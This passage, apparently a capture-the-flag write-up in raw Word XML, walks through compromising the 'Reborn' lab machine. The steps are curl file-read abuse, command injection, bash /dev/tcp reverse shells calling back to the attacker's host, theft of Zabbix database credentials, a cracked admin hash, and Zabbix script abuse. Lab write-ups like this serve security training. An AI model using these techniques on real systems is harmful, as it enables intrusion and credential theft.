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lab5yc6k7izh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7cq9x82bpsj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This write-up refers to the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Reborn</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine. If support is required, please open a ticket in the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support channel on the Discord server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2"/>
        <w:spacing w:after="80" w:lineRule="auto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8u25ashwjhe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80" w:lineRule="auto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agbsrhzah9s5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Reconnaissance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We started enumeration of the target machine using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify open</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ports and exposed services.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-vvv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95600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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Nmap </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">identified two open ports on the system: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">port 80 (HTTP)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port 22 (SSH)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. When accessing the web application via port 80, we were redirected to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">main application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, confirming that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service is active and accessible.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54300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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The web application contains an input field that accepts a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs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. We provided our own </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">address to verify whether the application performs external requests based on this input.</w:t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51100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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It was observed that the application performs an HTTP request to the provided IP address using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl’s User-Agent</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, indicating that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">back-end uses curl to perform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HTTP requests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03563"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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5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By using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, it is possible to abuse native options that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">allow reading local files and writing files to the system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> if user input is not properly validated.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curl, it was possible to read the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux system file /etc/passwd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http://&lt;your-ip&gt;/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@/etc/passwd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075239"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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523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63700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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It was also possible to read the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, which provided full access to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">web application’s source code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026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http://&lt;machine-ip&gt;/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@/var/www/html/index.php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670300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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36900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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With the application source code available, we proceeded to analyze it. On the very first line, a condition was identified that checks whether the parameter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">expertmode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is equal to the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tcp"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93900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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59000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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this </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">condition is true</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the application</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> returns and renders HTML content directly on the web page.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4076700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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analyzing the backend source code, it was identified that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">port</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter is concatenated directly into a call to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell_exec()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function, without any proper validation or sanitization. This implementation allows user-controlled data to be interpreted as operating system commands, characterizing a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Injection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vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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12074"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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07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As a result, it was possible to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">execute the id command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 the operating system, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">confirming </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command injection.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943600" cy="3254752"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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75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After validating this flaw, remote </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command execution was achieved.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Next, we leveraged </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (already identified in the backend) to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">download a reverse shell file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> hosted on a simple </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP server (Python)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> controlled by the attacker and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> execute it on the system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, resulting in a reverse </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">connection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the target machine.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http://&lt;vpn-ip&gt;/shell.sh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/tmp/shell.sh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4076700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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/dev/tcp/&lt;vpn-ip&gt;/443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0&gt;&amp;1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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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Next, the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/shell.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was executed, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">initializing the reverse shell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establishing a connection back to the attacker’s host</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, confirming </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remote control</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the system.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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="12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reverse connection was received as the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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thk3cloq5e80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Exploitation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shell was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upgraded to an interactive TTY</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, allowing better session control (support for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL+C, CTRL+Z</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, command history, and execution of interactive programs).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ctr+z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;fg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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="12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In the directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html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zabbix</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder was identified. 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Inside it, there is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory containing a Zabbix configuration file with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">database credentials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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="12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possible to obtain the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL database password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> zabbix.conf.php </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">configuration file.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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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obtained credentials, access to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Zabbix MySQL database</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was achieved.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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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  <w:t xml:space="preserve">With access to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Zabbix MySQL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> database, it was possible to extract the password </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hash </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user directly from the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">table.</w:t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$2y$10$Qcjjtq7XauueOab601qjM.XphS50C.Z2ym5uPmf4zWQOtlibG1W6C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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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Using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">extracted hash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the password was</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> cracked 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Hashcat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, resulting in the plaintext credential for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator user.</w:t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Admin:revolution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609600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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  <w:t xml:space="preserve">With the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator user password,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> it was possible to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authenticate to the web application with administrative privileges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4051300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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After authenticating, it was possible to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">access 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Alerts → Scripts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section, where default </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Zabbix scripts </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">are listed and can be executed by the system depending on permissions.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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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Zabbix allows </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">editing default scripts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Traceroute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Ping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modifying these scripts, it is possible to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">replace the original command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with an arbitrary command</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, such as a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which will be executed by the system when the script is triggered.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/dev/tcp/&lt;vpn-ip&gt;/443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0&gt;&amp;1'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modification, the script was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">saved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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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Monitoring → Hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the previously modified </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
